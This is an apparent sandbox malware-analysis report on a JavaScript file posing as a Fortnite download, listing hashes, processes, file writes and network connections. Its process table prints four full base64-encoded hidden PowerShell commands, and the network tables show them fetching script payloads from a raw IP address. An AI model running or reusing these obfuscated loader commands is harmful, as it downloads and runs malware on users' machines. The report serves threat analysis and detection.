File name: | traymoose-fortnite.js |
Full analysis: | https://app.any.run/tasks/9ae3bba1-15f0-4d84-ab01-8e79977d1934 |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 12:33:57 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | 6B0CF5F1B399091BA358326EE568410E |
SHA1: | 932E2CCDB5D9B28604E865A09E262BEFCF915273 |
SHA256: | 2F3CE25ABFDECC9EEA6C70CD8C2A797442D1A3E4ECABB3EEDCBCFA95AF6E8645 |
SSDEEP: | 192:W2zAOC8QJPeTpH6jdjBO3axG62eQM4A96Tdi/Q6G8RVLo:FsBQaMF29Yd96G2c |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3116 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\traymoose-fortnite.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2256 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADYAMwB9AHsANAAyAH0AewAxADIAfQB7ADcANgB9AHsAMgA0AH0AewAzAH0AewAxADEAOAB9AHsAMgB9AHsAMQAyAH0AewA1AH0AewA0AH0AewAzADYAfQB7ADIAOAB9AHsANQA4AH0AewAyADcAfQB7ADQAfQB7ADEAMgB9AHsAMgAxAH0AewA2AH0AewAzADkAfQB7ADEAMgB9AHsANAB9AHsANgB9AHsAMQAwADAAfQB7ADEAMgB9AHsAMQAxADgAfQB7ADUAOQB9AHsANQAyAH0AewAxADIAMQB9AHsAMQAyAH0AewA0ADIAfQB7ADQAfQB7ADgAOQB9AHsANgB9AHsAMwAxAH0AewAzAH0AewA3ADYAfQB7ADQAMgB9AHsANQAyAH0AewAzAH0AewAyADIAfQB7ADcAMgB9AHsAMQAwADIAfQB7ADEAMgAxAH0AewA1ADIAfQB7ADEAMgB9AHsANgAzAH0AewA0ADQAfQB7ADEAMAB9AHsANAB9AHsANAB9AHsANAAwAH0AewAwAH0AewAxADEAfQB7ADEAMQB9AHsAMQAyADAAfQB7ADMANQB9AHsAMwA1AH0AewA2AH0AewA4ADgAfQB7ADgAOAB9AHsANgB9AHsAMwA1AH0AewAyADMAfQB7ADYAfQB7ADMANAB9AHsAMgAzAH0AewAxADEAfQB7ADIANwB9AHsAMwAzAH0AewA1AH0AewAxADAAfQB7ADMAfQB7ADIANwB9AHsANAB9AHsANgB9AHsAMgB9AHsAMgA3AH0AewA0ADQAfQB7ADgAfQB7ADMANgB9AHsANwA5AH0AewAxADIAfQB7ADQAMgB9AHsAMwAzAH0AewAwAH0AewAzADgAfQB7ADYAMgB9AHsAMgA2AH0AewAxADcAfQB7ADMANgB9AHsANgA3AH0AewAzADYAfQB7ADQANAB9AHsANwB9AHsAMgA3AH0AewAzADMAfQB7ADUAfQB7ADEAMAB9AHsAMwB9AHsAMgA3AH0AewA0AH0AewA2AH0AewAyAH0AewAyADcAfQB7ADQANAB9AHsAOAA5AH0AewAxAH0AewAyADgAfQB7ADQAfQB7ADIAMgB9AHsANQAwAH0AewA0AH0AewAyADQAfQB7ADEANwB9AHsANQAwAH0AewAzAH0AewA1AH0AewAxADIAfQB7ADIANwB9AHsAMgA3AH0AewA2ADMAfQB7ADcAOQB9AHsAMQAyAH0AewA0ADIAfQB7ADMAMwB9AHsAMAB9AHsAMwA4AH0AewA2ADIAfQB7ADIANgB9AHsAMQA3AH0AewAzADYAfQB7ADYANwB9AHsAMwA2AH0AewA0ADQAfQB7ADcAfQB7ADIANwB9AHsAMwAzAH0AewA1AH0AewAxADAAfQB7ADMAfQB7ADIANwB9AHsANAB9AHsANgB9AHsAMgB9AHsAMgA3AH0AewA0ADQAfQB7ADgAOQB9AHsAMQB9ACIAIAAtAGYAIAAiADoAIgAsACIAOwAiACwAIgBqACIALAAiAG8AIgAsACIAdAAiACwAIgBjACIALAAiAC4AIgAsACIAXAAiACwAIgAsACIALAAiAGoAIgAsACIAaAAiACwAIgAvACIALAAiAGUAIgAsACIAZQAiACwAIgAuACIALAAiAGgAIgAsACIAZQAiACwAIgBQACIALAAiAGUAIgAsACIALgAiACwAIgB0ACIALAAiAG0AIgAsACIAYQAiACwAIgAzACIALAAiAC0AIgAsACIAdAAiACwAIgBNACIALAAiAHMAIgAsACIAUwAiACwAIgBjACIALAAiAC4AIgAsACIARAAiACwAIgAuACIALAAiAHYAIgAsACIAMgAiACwAIgA5ACIALAAiACAAIgAsACIAdgAiACwAIgBUACIALAAiAE4AIgAsACIAcAAiACwAIgB0ACIALAAiAG4AIgAsACIAdAAiACwAIgAnACIALAAiAFAAIgAsACIAOQAiACwAIgBzACIALAAiADsAIgAsACIAaAAiACwAIgByACIALAAiACAAIgAsACIAbAAiACwAIgAvACIALAAiAG8AIgAsACIAIAAiACwAIgBuACIALAAiAHQAIgAsACIAeQAiACwAIgBDACIALAAiACIALAAiADkAIgAsACIARQAiACwAIgAoACIALAAiAHMAIgAsACIAcwAiACwAIgBlACIALAAiACsAIgAsACIAJwAiACwAIgB0ACIALAAiAGwAIgAsACIALgAiACwAIgBkACIALAAiAGUAIgAsACIAZQAiACwAIgBzACIALAAiAHcAIgAsACIAcgAiACwAIgB2ACIALAAiACQAIgAsACIAOgAiACwAIgB0ACIALAAiACgAIgAsACIAKAAiACwAIgBzACIALAAiAC4AIgAsACIAYwAiACwAIgBcACIALAAiADYAIgAsACIAKQAiACwAIgBqACIALAAiAHMAIgAsACIAIAAiACwAIgBlACIALAAiACkAIgAsACIAbwAiACwAIgB0ACIALAAiAG8AIgAsACIAaAAiACwAIgAgACIALAAiAFcAIgAsACIAKQAiACwAIgBGACIALAAiAE0AIgAsACIAJAAiACwAIgBvACIALAAiADoAIgAsACIAJwAiACwAIgBzACIALAAiAHcAIgAsACIAZQAiACwAIgAnACIALAAiAHMAIgAsACIAbAAiACwAIgBvACIALAAiAGUAIgAsACIAagAiACwAIgAvACIALAAiAGIAIgAsACIAYQAiACwAIgAxACIALAAiAGkAIgAsACIAbwAiACwAIgAnACIALAAiACAAIgAsACIAcwAiACwAIgBpACIALAAiADMAIgAsACIARQAiACwAIgB2ACIALAAiAFAAIgAsACIAbgAiACwAIgAuACIALAAiAG4AIgAsACIAYwAiACwAIgB0ACIALAAiAHQAIgAsACIAKwAiACwAIgBjACIALAAiAC0AIgAsACIAYgAiACwAIgAuACIALAAiAG4AIgAsACIAdgAiACwAIgBTACIALAAiAHMAIgAsACIAVAAiACwAIgAnACIALAAiADYAIgAsACIAcwAiACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2544 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADMAMwB9AHsAOQB9AHsANgB9AHsANgAyAH0AewA1ADYAfQB7ADEANwB9AHsAMAB9AHsAMgA5AH0AewA2AH0AewAzAH0AewAxADYAfQB7ADIANwB9AHsAMQAzAH0AewAxADEAfQB7ADcAfQB7ADEANgB9AHsANgB9AHsANAA4AH0AewAyAH0AewAxADQAOQB9AHsANgB9AHsAMQA2AH0AewAyAH0AewAxADMAMgB9AHsANgB9AHsAMAB9AHsANQB9AHsAMwAwAH0AewA0ADUAfQB7ADYAfQB7ADkAfQB7ADEANgB9AHsAMgAxAH0AewAyAH0AewA1ADAAfQB7ADEANwB9AHsANgAyAH0AewA5AH0AewAzADAAfQB7ADEANwB9AHsANwA0AH0AewAzADQAfQB7ADEANQAzAH0AewA0ADUAfQB7ADMAMAB9AHsANgB9AHsAMwAzAH0AewAxADUAfQB7ADEAMwAzAH0AewAxADYAfQB7ADEANgB9AHsANwAzAH0AewA2ADUAfQB7ADEANAB9AHsAMQA0AH0AewAxADUAMAB9AHsAMQAwAH0AewAxADAAfQB7ADIAfQB7ADEAMAA0AH0AewAxADAANAB9AHsAMgB9AHsAMQAwAH0AewA5ADAAfQB7ADIAfQB7ADEAMwA3AH0AewA5ADAAfQB7ADEANAB9AHsANgB9AHsANwAxAH0AewAzAH0AewAzADAAfQB7ADEAfQB7ADcAfQB7ADQANQB9AHsAMQA3AH0AewA5AH0AewAyAH0AewAyADkAfQB7ADcAfQB7ADEANQB9AHsAMgA2AH0AewAyADcAfQB7ADEAMgB9AHsANgB9AHsAOQB9AHsANAB9AHsANgA1AH0AewA5ADcAfQB7ADkANAB9AHsANAA2AH0AewAyADIAfQB7ADIANwB9AHsAMwA5AH0AewAyADcAfQB7ADEANQB9AHsAMwA1AH0AewA2AH0AewA3ADEAfQB7ADMAfQB7ADMAMAB9AHsAMQB9AHsANwB9AHsANAA1AH0AewAxADcAfQB7ADkAfQB7ADIAfQB7ADIAOQB9AHsANwB9AHsAMQA1AH0AewAyADEAfQB7ADkAMgB9AHsAMQAzAH0AewAxADYAfQB7ADcANAB9AHsANAAxAH0AewAxADYAfQB7ADUANgB9AHsAMgAyAH0AewA0ADEAfQB7ADEANwB9AHsAMwB9AHsANgB9AHsANwB9AHsANwB9AHsAMwAzAH0AewAxADIAfQB7ADYAfQB7ADkAfQB7ADQAfQB7ADYANQB9AHsAOQA3AH0AewA5ADQAfQB7ADQANgB9AHsAMgAyAH0AewAyADcAfQB7ADMAOQB9AHsAMgA3AH0AewAxADUAfQB7ADMANQB9AHsANgB9AHsANwAxAH0AewAzAH0AewAzADAAfQB7ADEAfQB7ADcAfQB7ADQANQB9AHsAMQA3AH0AewA5AH0AewAyAH0AewAyADkAfQB7ADcAfQB7ADEANQB9AHsAMgAxAH0AewA5ADIAfQAiACAALQBmACAAIgBiACIALAAiAHUAIgAsACIALgAiACwAIgBjACIALAAiAHYAIgAsACIAQwAiACwAIgBlACIALAAiAHMAIgAsACIAIgAsACIAbgAiACwAIgA5ACIALAAiAHkAIgAsACIAJAAiACwAIgBTACIALAAiAC8AIgAsACIAJwAiACwAIgB0ACIALAAiAG8AIgAsACIAcwAiACwAIgB0ACIALAAiAG8AIgAsACIAKQAiACwAIgBQACIALAAiAHYAIgAsACIAJwAiACwAIgBuACIALAAiACwAIgAsACIAIAAiACwAIgBlACIALAAiAGoAIgAsACIAbAAiACwAIgBqACIALAAiAHQAIgAsACIAKAAiACwAIgBkACIALAAiAFwAIgAsACIAbwAiACwAIgBlACIALAAiAGMAIgAsACIAKwAiACwAIgBTACIALAAiAHIAIgAsACIAIAAiACwAIgBsACIALAAiACkAIgAsACIAaQAiACwAIgBNACIALAAiAHMAIgAsACIAbQAiACwAIgBzACIALAAiAEQAIgAsACIALgAiACwAIgAgACIALAAiAGoAIgAsACIAcgAiACwAIgA5ACIALAAiAC0AIgAsACIALwAiACwAIgAuACIALAAiAC4AIgAsACIAIAAiACwAIgAvACIALAAiAHcAIgAsACIAJwAiACwAIgBuACIALAAiADoAIgAsACIAdwAiACwAIgBjACIALAAiAGMAIgAsACIAXAAiACwAIgBQACIALAAiAHgAIgAsACIAdQAiACwAIgBwACIALAAiAGEAIgAsACIAdAAiACwAIgAkACIALAAiAHMAIgAsACIALgAiACwAIgBuACIALAAiAGIAIgAsACIAagAiACwAIgBuACIALAAiAGUAIgAsACIAeAAiACwAIgAoACIALAAiAGUAIgAsACIAIAAiACwAIgBvACIALAAiAHUAIgAsACIAMwAiACwAIgBuACIALAAiADsAIgAsACIAbwAiACwAIgBFACIALAAiACcAIgAsACIAcwAiACwAIgBUACIALAAiAGwAIgAsACIARQAiACwAIgA5ACIALAAiAG8AIgAsACIAdAAiACwAIgBsACIALAAiADYAIgAsACIAZQAiACwAIgBlACIALAAiAHMAIgAsACIAIAAiACwAIgAuACIALAAiACkAIgAsACIAYwAiACwAIgArACIALAAiAGUAIgAsACIAYQAiACwAIgBuACIALAAiAGUAIgAsACIAJwAiACwAIgBzACIALAAiACcAIgAsACIAdAAiACwAIgAuACIALAAiAGwAIgAsACIALgAiACwAIgBvACIALAAiAGkAIgAsACIAcwAiACwAIgBpACIALAAiADMAIgAsACIAbAAiACwAIgBuACIALAAiAGUAIgAsACIAVwAiACwAIgBoACIALAAiADoAIgAsACIAdAAiACwAIgBNACIALAAiADIAIgAsACIAUAAiACwAIgBlACIALAAiADYAIgAsACIAOgAiACwAIgBpACIALAAiAGUAIgAsACIAKAAiACwAIgB4ACIALAAiAGUAIgAsACIAdAAiACwAIgAuACIALAAiAE4AIgAsACIAMQAiACwAIgBpACIALAAiAC0AIgAsACIARgAiACwAIgA7ACIALAAiAFQAIgApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2920 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADUANAB9AHsANQB9AHsANQAwAH0AewA3AH0AewA0ADkAfQB7ADEANgB9AHsAMAB9AHsAMQB9AHsANQAwAH0AewAxADIAMQB9AHsAMwB9AHsAMQAyAH0AewA1ADMAfQB7ADYAMQB9AHsAOAB9AHsAMwB9AHsANQAwAH0AewA1ADIAfQB7ADIAfQB7ADkAMQB9AHsANQAwAH0AewAzAH0AewAyAH0AewAxADAAOAB9AHsANQAwAH0AewAwAH0AewA3ADYAfQB7ADIAMwB9AHsAMgA0AH0AewA1ADAAfQB7ADUAfQB7ADMAfQB7ADkAfQB7ADIAfQB7ADEAMgAzAH0AewAxADYAfQB7ADcAfQB7ADUAfQB7ADIAMwB9AHsAMQA2AH0AewAxADEAfQB7ADEAMgAyAH0AewAyADUAfQB7ADIANAB9AHsAMgAzAH0AewA1ADAAfQB7ADUANAB9AHsAMwA4AH0AewAxADEANQB9AHsAMwB9AHsAMwB9AHsAMQAzADIAfQB7ADEAOAB9AHsANAB9AHsANAB9AHsAMgAwAH0AewA4ADQAfQB7ADgANAB9AHsAMgB9AHsAMQA0AH0AewAxADQAfQB7ADIAfQB7ADgANAB9AHsAOAA5AH0AewAyAH0AewA0ADEAfQB7ADgAOQB9AHsANAB9AHsAMgAwAH0AewAyAH0AewAxADcAfQB7ADAAfQB7ADgAfQB7ADMAOAB9AHsAOAA3AH0AewAxADIAfQB7ADcAOQB9AHsANQAwAH0AewA1AH0AewAxADcAfQB7ADEAOAB9AHsAMwAwAH0AewAxADAAOQB9AHsAMgA3AH0AewA1ADYAfQB7ADEAMgB9AHsANgAwAH0AewAxADIAfQB7ADMAOAB9AHsANAA0AH0AewAyADAAfQB7ADIAfQB7ADEANwB9AHsAMAB9AHsAOAB9AHsAMwA4AH0AewA5AH0AewA5ADQAfQB7ADUAMwB9AHsAMwB9AHsAMQAxAH0AewA0ADcAfQB7ADMAfQB7ADQAOQB9AHsANQA2AH0AewA0ADcAfQB7ADEANgB9AHsAMQAyADEAfQB7ADUAMAB9AHsAOAB9AHsAOAB9AHsANQA0AH0AewA3ADkAfQB7ADUAMAB9AHsANQB9AHsAMQA3AH0AewAxADgAfQB7ADMAMAB9AHsAMQAwADkAfQB7ADIANwB9AHsANQA2AH0AewAxADIAfQB7ADYAMAB9AHsAMQAyAH0AewAzADgAfQB7ADQANAB9AHsAMgAwAH0AewAyAH0AewAxADcAfQB7ADAAfQB7ADgAfQB7ADMAOAB9AHsAOQB9AHsAOQA0AH0AIgAgAC0AZgAgACIAYgAiACwAIgBqACIALAAiAC4AIgAsACIAdAAiACwAIgAvACIALAAiAG4AIgAsACIALgAiACwAIgB3ACIALAAiAHMAIgAsACIAKQAiACwAIgB0ACIALAAiAGEAIgAsACIAIAAiACwAIgAuACIALAAiADYAIgAsACIAYgAiACwAIgBvACIALAAiAHYAIgAsACIAOgAiACwAIgBzACIALAAiADEAIgAsACIAYQAiACwAIgAuACIALAAiAGwAIgAsACIAaQAiACwAIgBGACIALAAiAC4AIgAsACIATQAiACwAIgA6ACIALAAiAE0AIgAsACIAVAAiACwAIgBuACIALAAiACIALAAiADYAIgAsACIALgAiACwAIgBzACIALAAiAG4AIgAsACIAbwAiACwAIgAnACIALAAiACkAIgAsACIAbwAiACwAIgAyACIALAAiAHQAIgAsACIAYgAiACwAIgBcACIALAAiADEAIgAsACIAJwAiACwAIgByACIALAAiAHMAIgAsACIALQAiACwAIgBlACIALAAiAHYAIgAsACIAbQAiACwAIgBTACIALAAiACgAIgAsACIAXAAiACwAIgBQACIALAAiAGUAIgAsACIAMQAiACwAIgA6ACIALAAiACsAIgAsACIAeQAiACwAIgAoACIALAAiAG4AIgAsACIAdAAiACwAIgAtACIALAAiAHQAIgAsACIAbgAiACwAIgBlACIALAAiACkAIgAsACIAUAAiACwAIgAnACIALAAiAGUAIgAsACIAUAAiACwAIgBUACIALAAiAHQAIgAsACIAQwAiACwAIgBsACIALAAiADEAIgAsACIAJAAiACwAIgAnACIALAAiACQAIgAsACIAIAAiACwAIgBlACIALAAiADkAIgAsACIAOQAiACwAIgB2ACIALAAiACwAIgAsACIAZQAiACwAIgAzACIALAAiACcAIgAsACIATgAiACwAIgBTACIALAAiAC4AIgAsACIAOwAiACwAIgBlACIALAAiAC4AIgAsACIAdwAiACwAIgBzACIALAAiACAAIgAsACIAIAAiACwAIgA5ACIALAAiACgAIgAsACIAIAAiACwAIgBvACIALAAiAGIAIgAsACIAZQAiACwAIgAuACIALAAiAFcAIgAsACIARQAiACwAIgBlACIALAAiADsAIgAsACIAbAAiACwAIgAvACIALAAiAC8AIgAsACIAaAAiACwAIgAgACIALAAiAHYAIgAsACIAaQAiACwAIgB0ACIALAAiADMAIgAsACIAYwAiACwAIgBkACIALAAiAEQAIgAsACIAcgAiACwAIgAnACIALAAiACsAIgAsACIAYwAiACwAIgBiACIALAAiAHQAIgAsACIAZQAiACwAIgBzACIALAAiAHAAIgAsACIAdgAiACwAIgBFACIAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3224 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADUANAB9AHsAMgA1AH0AewA4AH0AewAxADUAfQB7ADYAMgB9AHsANQA4AH0AewA5ADAAfQB7ADMANwB9AHsAOAB9AHsAMQAzADkAfQB7ADEAMgB9AHsAMAB9AHsAMgA3AH0AewAzAH0AewAxADAAfQB7ADEAMgB9AHsAOAB9AHsANwAyAH0AewA2AH0AewAyAH0AewA4AH0AewAxADIAfQB7ADYAfQB7ADQAOAB9AHsAOAB9AHsAOQAwAH0AewA0ADYAfQB7ADMAMAB9AHsAMwAzAH0AewA4AH0AewAyADUAfQB7ADEAMgB9AHsAMgA5AH0AewA2AH0AewAzADgAfQB7ADUAOAB9AHsAMQA1AH0AewAyADUAfQB7ADMAMAB9AHsANQA4AH0AewAzADQAfQB7ADEAMwA4AH0AewAxADEAfQB7ADMAMwB9AHsAMwAwAH0AewA4AH0AewA1ADQAfQB7ADEAfQB7ADEANAA5AH0AewAxADIAfQB7ADEAMgB9AHsANgA2AH0AewAyADMAfQB7ADUAfQB7ADUAfQB7ADEAMwAyAH0AewA3AH0AewA3AH0AewA2AH0AewAzADIAfQB7ADMAMgB9AHsANgB9AHsANwB9AHsAOQB9AHsANgB9AHsAMQAxADUAfQB7ADkAfQB7ADUAfQB7ADEAMAB9AHsAMwB9AHsAMQAwAH0AewAzADMAfQB7ADIANQB9AHsAMQAyAH0AewA4AH0AewAxADYAfQB7ADEANgB9AHsAOAAzAH0AewA2ADYAfQB7ADEAMgB9AHsAMQAwAH0AewA2AH0AewAzADcAfQB7ADEAMAB9AHsAMQB9AHsAMQA1ADIAfQB7ADAAfQB7ADQAMgB9AHsAOAB9AHsAMgA1AH0AewA1ADkAfQB7ADIAMwB9AHsANQA2AH0AewAyADEAfQB7ADYANQB9AHsANQA1AH0AewAwAH0AewA0AH0AewAwAH0AewAxAH0AewA4ADgAfQB7ADEAMAB9AHsAMwB9AHsAMQAwAH0AewAzADMAfQB7ADIANQB9AHsAMQAyAH0AewA4AH0AewAxADYAfQB7ADEANgB9AHsAOAAzAH0AewA2ADYAfQB7ADEAMgB9AHsAMQAwAH0AewA2AH0AewAzADcAfQB7ADEAMAB9AHsAMQB9AHsAMgA5AH0AewAxADAAMwB9AHsAMgA3AH0AewAxADIAfQB7ADMANAB9AHsAMQA2AH0AewAxADIAfQB7ADYAMgB9AHsANQA1AH0AewAxADYAfQB7ADUAOAB9AHsAMQAzADkAfQB7ADgAfQB7ADEAMAB9AHsAMQAwAH0AewA1ADQAfQB7ADQAMgB9AHsAOAB9AHsAMgA1AH0AewA1ADkAfQB7ADIAMwB9AHsANQA2AH0AewAyADEAfQB7ADYANQB9AHsANQA1AH0AewAwAH0AewA0AH0AewAwAH0AewAxAH0AewA4ADgAfQB7ADEAMAB9AHsAMwB9AHsAMQAwAH0AewAzADMAfQB7ADIANQB9AHsAMQAyAH0AewA4AH0AewAxADYAfQB7ADEANgB9AHsAOAAzAH0AewA2ADYAfQB7ADEAMgB9AHsAMQAwAH0AewA2AH0AewAzADcAfQB7ADEAMAB9AHsAMQB9AHsAMgA5AH0AewAxADAAMwB9ACIAIAAtAGYAIAAiACAAIgAsACIAJwAiACwAIgBOACIALAAiAHkAIgAsACIAKwAiACwAIgAvACIALAAiAC4AIgAsACIAOQAiACwAIgBlACIALAAiADMAIgAsACIAcwAiACwAIgBGACIALAAiAHQAIgAsACIAdAAiACwAIgAiACwAIgB3ACIALAAiAHIAIgAsACIALwAiACwAIgAuACIALAAiACAAIgAsACIAcgAiACwAIgBFACIALAAiAC4AIgAsACIAOgAiACwAIgBlACIALAAiAG4AIgAsACIAbgAiACwAIgBTACIALAAiAGUAIgAsACIAKQAiACwAIgBsACIALAAiAGUAIgAsACIANgAiACwAIgBpACIALAAiAGEAIgAsACIAcwAiACwAIgBzACIALAAiAGoAIgAsACIARAAiACwAIgByACIALAAiACcAIgAsACIAdAAiACwAIgAkACIALAAiADkAIgAsACIAcgAiACwAIgBlACIALAAiAEMAIgAsACIAagAiACwAIgBXACIALAAiAGEAIgAsACIALgAiACwAIgBzACIALAAiADoAIgAsACIAbAAiACwAIgAoACIALAAiAFAAIgAsACIAVAAiACwAIgB0ACIALAAiAG8AIgAsACIAdgAiACwAIgAuACIALAAiAFAAIgAsACIALQAiACwAIgBqACIALAAiAGwAIgAsACIATQAiACwAIgBwACIALAAiAC4AIgAsACIAZQAiACwAIgByACIALAAiAFMAIgAsACIAdAAiACwAIgBtACIALAAiAG8AIgAsACIAcwAiACwAIgB0ACIALAAiAG8AIgAsACIAcwAiACwAIgAuACIALAAiADkAIgAsACIAdAAiACwAIgB0ACIALAAiAG4AIgAsACIAdQAiACwAIgBpACIALAAiAHMAIgAsACIAcwAiACwAIgAnACIALAAiAFwAIgAsACIAcAAiACwAIgBiACIALAAiAHMAIgAsACIAcwAiACwAIgB0ACIALAAiADYAIgAsACIAKQAiACwAIgAnACIALAAiACAAIgAsACIAcAAiACwAIgAzACIALAAiAHQAIgAsACIAKAAiACwAIgB5ACIALAAiADsAIgAsACIALQAiACwAIgBzACIALAAiADsAIgAsACIAKQAiACwAIgB0ACIALAAiAHQAIgAsACIALgAiACwAIgByACIALAAiAGoAIgAsACIAcwAiACwAIgBNACIALAAiADIAIgAsACIAdwAiACwAIgBwACIALAAiACAAIgAsACIAcwAiACwAIgAuACIALAAiAHUAIgAsACIAcgAiACwAIgB0ACIALAAiAHUAIgAsACIAbgAiACwAIgBuACIALAAiAGUAIgAsACIAbgAiACwAIgBpACIALAAiACAAIgAsACIAZQAiACwAIgAxACIALAAiACcAIgAsACIAOgAiACwAIgBFACIALAAiAFQAIgAsACIAXAAiACwAIgBkACIALAAiAGMAIgAsACIAJwAiACwAIgByACIALAAiAG4AIgAsACIAIAAiACwAIgBlACIALAAiAGkAIgAsACIAcwAiACwAIgB2ACIALAAiACQAIgAsACIAaAAiACwAIgBlACIALAAiAHkAIgAsACIALAAiACwAIgBuACIALAAiAG8AIgAsACIAYgAiACwAIgBzACIALAAiAHQAIgAsACIAeQAiACwAIgAoACIALAAiAGMAIgAsACIAKwAiACwAIgBlACIALAAiAFAAIgAsACIALwAiACwAIgBpACIALAAiAGUAIgAsACIAZQAiACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\380333HBGNADY92MVX0E.temp | — | |
MD5:— | SHA256:— | |||
2544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9L2RGC74MQ8BSU3W7LGS.temp | — | |
MD5:— | SHA256:— | |||
3224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QN583E713ZV8262CMJKC.temp | — | |
MD5:— | SHA256:— | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D99E61BZ3R79ZMEF9R35.temp | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a8b9.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a936.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3224 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/sysinterrupts.js | CA | — | — | suspicious |
2544 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/exclusion.js | CA | — | — | suspicious |
2920 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/1.vbs | CA | — | — | suspicious |
2256 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/svchost.js | CA | — | — | suspicious |
2256 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/svchost.js | CA | — | — | suspicious |
3224 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/sysinterrupts.js | CA | — | — | suspicious |
2544 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/exclusion.js | CA | — | — | suspicious |
2920 | powershell.exe | GET | — | 199.66.93.23:80 | http://199.66.93.23/1.vbs | CA | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3224 | powershell.exe | 199.66.93.23:80 | — | Yesup Ecommerce Solutions Inc. | CA | suspicious |
2256 | powershell.exe | 199.66.93.23:80 | — | Yesup Ecommerce Solutions Inc. | CA | suspicious |
— | — | 199.66.93.23:80 | — | Yesup Ecommerce Solutions Inc. | CA | suspicious |
2544 | powershell.exe | 199.66.93.23:80 | — | Yesup Ecommerce Solutions Inc. | CA | suspicious |
2920 | powershell.exe | 199.66.93.23:80 | — | Yesup Ecommerce Solutions Inc. | CA | suspicious |